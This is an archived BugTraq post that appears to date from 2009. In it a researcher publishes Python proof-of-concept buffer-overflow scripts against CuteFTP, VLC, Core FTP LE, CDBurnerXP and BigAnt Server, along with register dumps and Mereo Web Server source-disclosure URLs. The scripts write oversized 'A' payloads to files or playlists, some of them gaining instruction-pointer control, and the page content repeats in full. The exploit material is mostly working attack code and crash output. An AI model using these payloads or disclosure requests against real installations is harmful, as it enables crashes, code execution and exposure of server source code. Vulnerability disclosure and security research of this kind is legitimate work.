BugTraq
Back to list
|
Post reply
Multiple Vulnerabilities
Sep 25 2009 05:24PM
Dr_IDE (dr_ide hushmail com)
Usually I submit via milw0rm but it has been unresponsive all week.
Here are a few new vulnerabilities and updates.
-Dr_IDE#!/usr/bin/env python
########################################################################
#############################
#
# CuteFTP v8.3.3 Home/Pro/Lite Create New Site Local Buffer Overflow PoC
# Found By: Dr_IDE
# Download: http://www.cuteftp.com/downloads/
# Tested On: Windows 7 RC, XP might be more shell friendly
# Notes: This PoC exploits the "Create New Site" mechanism. Any site type that you pick will work.
# Because of differences in the internal process of each site type you may be able to get
# execution through one of these channels.
#
########################################################################
#############################
"""
EAX 02120000
ECX 0228BA90 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
EDX 41414141
EBX 00004141
ESP 0018C160
EBP 0018C230
ESI 0228BA88
EDI 41414141
EIP 77843913 ntdll.77843913
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 1 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -??? FFFF 000000FF 00FF00FF
ST1 empty -??? FFFF 00000000 00008200
ST2 empty -??? FFFF 00010000 00010000
ST3 empty 431.99999034404754640
ST4 empty 1.0000000000000000000
ST5 empty 1.0000000000000000000
ST6 empty 16.000000000000000000
ST7 empty 16.000000000000000000
3 2 1 0 E S P U O Z D I
FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
"""
buff = ("\x41" * 20000)
try:
f1 = open("CuteFTP.txt","w");
f1.write(buff);
f1.close();
print "\nCuteFTP v8.3.2 Home/Pro/Lite Create New Site Local Buffer Overflow PoC"
print "By: Dr_IDE"
print "\nFile Created Successfully.\n"
print "Usage:\n [-] Click File\n [-] Create New FTP Site\n [-] Paste String into Label Field\n [-] Enter anything for Address\n [-] Click Connect\n [-] Boom."
except:
print "[-] Error. File couldn't be created."###############################################################
###########################################
#
# VLC Media Player 1.0.2 smb:// URI Handling Remote Stack Overflow PoC
# Found By: Dr_IDE
# Tested: Windows XP SP2 , XP SP3 and Windows 7 RC1 with VLC 1.0.2 "Goldeneye"
# Download: http://majorgeeks.com/downloadget.php?id=4674&file=1&evp=a87d1b50269ba27
878899d30ec7cd947
#
########################################################################
##################################
# XPSP3 Crash
"""
EAX FFFFFFFE
ECX 42424242 <--------- w00t!
EDX 00000000
EBX 42424242
ESP 02EAF694
EBP 02EAF7C4
ESI 61CC8324 libacc_4.61CC8324
EDI 61CC8323 libacc_4.61CC8323
EIP 77C478AC msvcrt.77C478AC
C 0 ES 0023 32bit 0(FFFFFFFF)
P 0 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFAC000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_MOD_NOT_FOUND (0000007E)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -UNORM FB18 0184A1C0 00AD4518
ST1 empty +UNORM 2088 00000000 00000000
ST2 empty 0.3987488760738806780e-4933
ST3 empty -??? FFFF 00000000 77C2C42E
ST4 empty +UNORM 0B10 00B094E8 00000000
ST5 empty 0.3987486256431287370e-4933
ST6 empty 0.0
ST7 empty -0.2650710894356302916
3 2 1 0 E S P U O Z D I
FST 0020 Cond 0 0 0 0 Err 0 0 1 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
"""
header1 = ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n")
header1 += ("<playlist version=\"1\" xmlns=\"http://xspf.org/ns/0/\" xmlns:vlc=\"http://www.videolan.org/vlc/playlist/ns/0/\">\n")
header1 += ("\t<title>Playlist</title>\n")
header1 += ("\t<trackList>\n")
header1 += ("\t\t<track>\n")
header1 += ("\t\t\t<location>smb://example.com (at) www.example (dot) com [email concealed]/foo/#{")
payload = ("\x41" * 2 + "\x42" * 4 + "\x43" * 10000)
header2 = ("}</location>\n");
header2 += ("\t\t\t<extension application=\"http://www.videolan.org/vlc/playlist/0\">\n");
header2 += ("\t\t\t\t<vlc:id>0</vlc:id>\n");
header2 += ("\t\t\t</extension>\n");
header2 += ("\t\t</track>\n");
header2 += ("\t</trackList>\n");
header2 += ("</playlist>\n");
try:
f1 = open("vlc_1.0.2.xspf","w")
f1.write(header1 + payload + header2)
f1.close()
print("\nExploit file created!\n")
except:
print "Error"
#!/usr/bin/env python
########################################################################
############
#
# Core FTP LE v2.1 build 1612 Local Buffer Overflow PoC (Unicode)
# Found By: Dr_IDE
# Tested On: XPSP3, 7RC
# Notes: Most likely other versions are vulnerable too.
# Usage: File, Quick Connect, Paste into Hostname, Connect
#
########################################################################
############
# Register Dump on XPSP3
"""
EAX 00000064
ECX 00410041 coreftp.00410041
EDX 0054F840 coreftp.0054F840
EBX 026E2FFC
ESP 0321E958 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 00410041 coreftp.00410041
ESI 0269CC30
EDI 04BB6A58 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EIP 00410041 coreftp.00410041
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFD7000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr WSAHOST_NOT_FOUND (00002AF9)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.0
ST7 empty 0.0
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
"""
# After Passing Exception on XPSP3
# EIP 00410041 coreftp.00410041
buff = ("\x41" * 6000)
f1 = open("coreftple.txt","w")
f1.write(buff)
f1.close()
#!/usr/bin/env python
########################################################################
############
#
# CDBurnerXP v 4.2.4.1351 Local Crash PoC
# Found By: Dr_IDE
# Tested On: XPSP3, 7RC
# Usage: Create New Data Disc, Add a Folder, Paste to Rename Folder, Click Save Compilation as ISO
# Notes: Super lame and most likely not exploitable.
#
########################################################################
############
'''
Error Message:
System.NullReferenceException: Object reference not set to an instance of an object.
at CDBurnerXP.Controls.FileLayoutManager.SaveAsIso(String filename)
at CDBurnerXP_Pro.frmDataCompilation.mnuSaveISO_Click(Object sender, EventArgs e)
at System.Windows.Forms.MenuItem.OnClick(EventArgs e)
at System.Windows.Forms.MenuItem.MenuItemData.Execute()
at System.Windows.Forms.Command.Invoke()
at System.Windows.Forms.Command.DispatchID(Int32 id)
at System.Windows.Forms.Control.WmCommand(Message& m)
at System.Windows.Forms.Control.WndProc(Message& m)
at System.Windows.Forms.ScrollableControl.WndProc(Message& m)
at System.Windows.Forms.ContainerControl.WndProc(Message& m)
at System.Windows.Forms.Form.WndProc(Message& m)
at CDBurnerXP.Forms.BaseForm.WndProc(Message& m)
at CDBurnerXP_Pro.mdiMain.WndProc(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)
'''
buff = ("\x41" * 5000)
f1 = open("cdburnerxp.txt","w")
f1.write(buff)
f1.close()
#!/usr/bin/env python
########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Plug-In, Add our zip, Boom.
#
########################################################################
buff = ("\x41" * 10000)
f1 = open("BigAntPlugIn.zip","w")
f1.write(buff)
f1.close()
#!/usr/bin/env python
########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Update, Add our zip, Boom.
#
########################################################################
buff = ("\x41" * 10000)
f1 = open("BigAntUpdate.zip","w")
f1.write(buff)
f1.close()
########################################################################
#########
#
# Mereo Web Server v1.8 Multiple Remote Source Code Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
#
########################################################################
#########
- Description -
Mereo Web Server v1.8 is a Windows based HTTP server. This is the latest version of
the application available.
Mereo is vulnerable to remote arbitrary source code disclosure by the following means.
- Technical Details -
http://[ webserver IP]/[ file ][.]
http://[ webserver IP]/[ file ][::$DATA]
http://172.16.2.101/index.html.
http://172.16.2.101/index.html::$DATA
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Here are a few new vulnerabilities and updates.
-Dr_IDE#!/usr/bin/env python
########################################################################
#############################
#
# CuteFTP v8.3.3 Home/Pro/Lite Create New Site Local Buffer Overflow PoC
# Found By: Dr_IDE
# Download: http://www.cuteftp.com/downloads/
# Tested On: Windows 7 RC, XP might be more shell friendly
# Notes: This PoC exploits the "Create New Site" mechanism. Any site type that you pick will work.
# Because of differences in the internal process of each site type you may be able to get
# execution through one of these channels.
#
########################################################################
#############################
"""
EAX 02120000
ECX 0228BA90 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA
EDX 41414141
EBX 00004141
ESP 0018C160
EBP 0018C230
ESI 0228BA88
EDI 41414141
EIP 77843913 ntdll.77843913
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 1 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -??? FFFF 000000FF 00FF00FF
ST1 empty -??? FFFF 00000000 00008200
ST2 empty -??? FFFF 00010000 00010000
ST3 empty 431.99999034404754640
ST4 empty 1.0000000000000000000
ST5 empty 1.0000000000000000000
ST6 empty 16.000000000000000000
ST7 empty 16.000000000000000000
3 2 1 0 E S P U O Z D I
FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
"""
buff = ("\x41" * 20000)
try:
f1 = open("CuteFTP.txt","w");
f1.write(buff);
f1.close();
print "\nCuteFTP v8.3.2 Home/Pro/Lite Create New Site Local Buffer Overflow PoC"
print "By: Dr_IDE"
print "\nFile Created Successfully.\n"
print "Usage:\n [-] Click File\n [-] Create New FTP Site\n [-] Paste String into Label Field\n [-] Enter anything for Address\n [-] Click Connect\n [-] Boom."
except:
print "[-] Error. File couldn't be created."###############################################################
###########################################
#
# VLC Media Player 1.0.2 smb:// URI Handling Remote Stack Overflow PoC
# Found By: Dr_IDE
# Tested: Windows XP SP2 , XP SP3 and Windows 7 RC1 with VLC 1.0.2 "Goldeneye"
# Download: http://majorgeeks.com/downloadget.php?id=4674&file=1&evp=a87d1b50269ba27
878899d30ec7cd947
#
########################################################################
##################################
# XPSP3 Crash
"""
EAX FFFFFFFE
ECX 42424242 <--------- w00t!
EDX 00000000
EBX 42424242
ESP 02EAF694
EBP 02EAF7C4
ESI 61CC8324 libacc_4.61CC8324
EDI 61CC8323 libacc_4.61CC8323
EIP 77C478AC msvcrt.77C478AC
C 0 ES 0023 32bit 0(FFFFFFFF)
P 0 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFAC000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_MOD_NOT_FOUND (0000007E)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -UNORM FB18 0184A1C0 00AD4518
ST1 empty +UNORM 2088 00000000 00000000
ST2 empty 0.3987488760738806780e-4933
ST3 empty -??? FFFF 00000000 77C2C42E
ST4 empty +UNORM 0B10 00B094E8 00000000
ST5 empty 0.3987486256431287370e-4933
ST6 empty 0.0
ST7 empty -0.2650710894356302916
3 2 1 0 E S P U O Z D I
FST 0020 Cond 0 0 0 0 Err 0 0 1 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
"""
header1 = ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n")
header1 += ("<playlist version=\"1\" xmlns=\"http://xspf.org/ns/0/\" xmlns:vlc=\"http://www.videolan.org/vlc/playlist/ns/0/\">\n")
header1 += ("\t<title>Playlist</title>\n")
header1 += ("\t<trackList>\n")
header1 += ("\t\t<track>\n")
header1 += ("\t\t\t<location>smb://example.com (at) www.example (dot) com [email concealed]/foo/#{")
payload = ("\x41" * 2 + "\x42" * 4 + "\x43" * 10000)
header2 = ("}</location>\n");
header2 += ("\t\t\t<extension application=\"http://www.videolan.org/vlc/playlist/0\">\n");
header2 += ("\t\t\t\t<vlc:id>0</vlc:id>\n");
header2 += ("\t\t\t</extension>\n");
header2 += ("\t\t</track>\n");
header2 += ("\t</trackList>\n");
header2 += ("</playlist>\n");
try:
f1 = open("vlc_1.0.2.xspf","w")
f1.write(header1 + payload + header2)
f1.close()
print("\nExploit file created!\n")
except:
print "Error"
#!/usr/bin/env python
########################################################################
############
#
# Core FTP LE v2.1 build 1612 Local Buffer Overflow PoC (Unicode)
# Found By: Dr_IDE
# Tested On: XPSP3, 7RC
# Notes: Most likely other versions are vulnerable too.
# Usage: File, Quick Connect, Paste into Hostname, Connect
#
########################################################################
############
# Register Dump on XPSP3
"""
EAX 00000064
ECX 00410041 coreftp.00410041
EDX 0054F840 coreftp.0054F840
EBX 026E2FFC
ESP 0321E958 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EBP 00410041 coreftp.00410041
ESI 0269CC30
EDI 04BB6A58 UNICODE "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
EIP 00410041 coreftp.00410041
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFD7000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr WSAHOST_NOT_FOUND (00002AF9)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.0
ST7 empty 0.0
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
"""
# After Passing Exception on XPSP3
# EIP 00410041 coreftp.00410041
buff = ("\x41" * 6000)
f1 = open("coreftple.txt","w")
f1.write(buff)
f1.close()
#!/usr/bin/env python
########################################################################
############
#
# CDBurnerXP v 4.2.4.1351 Local Crash PoC
# Found By: Dr_IDE
# Tested On: XPSP3, 7RC
# Usage: Create New Data Disc, Add a Folder, Paste to Rename Folder, Click Save Compilation as ISO
# Notes: Super lame and most likely not exploitable.
#
########################################################################
############
'''
Error Message:
System.NullReferenceException: Object reference not set to an instance of an object.
at CDBurnerXP.Controls.FileLayoutManager.SaveAsIso(String filename)
at CDBurnerXP_Pro.frmDataCompilation.mnuSaveISO_Click(Object sender, EventArgs e)
at System.Windows.Forms.MenuItem.OnClick(EventArgs e)
at System.Windows.Forms.MenuItem.MenuItemData.Execute()
at System.Windows.Forms.Command.Invoke()
at System.Windows.Forms.Command.DispatchID(Int32 id)
at System.Windows.Forms.Control.WmCommand(Message& m)
at System.Windows.Forms.Control.WndProc(Message& m)
at System.Windows.Forms.ScrollableControl.WndProc(Message& m)
at System.Windows.Forms.ContainerControl.WndProc(Message& m)
at System.Windows.Forms.Form.WndProc(Message& m)
at CDBurnerXP.Forms.BaseForm.WndProc(Message& m)
at CDBurnerXP_Pro.mdiMain.WndProc(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.OnMessage(Message& m)
at System.Windows.Forms.Control.ControlNativeWindow.WndProc(Message& m)
at System.Windows.Forms.NativeWindow.Callback(IntPtr hWnd, Int32 msg, IntPtr wparam, IntPtr lparam)
'''
buff = ("\x41" * 5000)
f1 = open("cdburnerxp.txt","w")
f1.write(buff)
f1.close()
#!/usr/bin/env python
########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Plug-In, Add our zip, Boom.
#
########################################################################
buff = ("\x41" * 10000)
f1 = open("BigAntPlugIn.zip","w")
f1.write(buff)
f1.close()
#!/usr/bin/env python
########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: Dr_IDE
# Tested: XPSP3
# Usage: Open BigAnt Console, Go to Update, Add our zip, Boom.
#
########################################################################
buff = ("\x41" * 10000)
f1 = open("BigAntUpdate.zip","w")
f1.write(buff)
f1.close()
########################################################################
#########
#
# Mereo Web Server v1.8 Multiple Remote Source Code Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
#
########################################################################
#########
- Description -
Mereo Web Server v1.8 is a Windows based HTTP server. This is the latest version of
the application available.
Mereo is vulnerable to remote arbitrary source code disclosure by the following means.
- Technical Details -
http://[ webserver IP]/[ file ][.]
http://[ webserver IP]/[ file ][::$DATA]
http://172.16.2.101/index.html.
http://172.16.2.101/index.html::$DATA
[ reply ]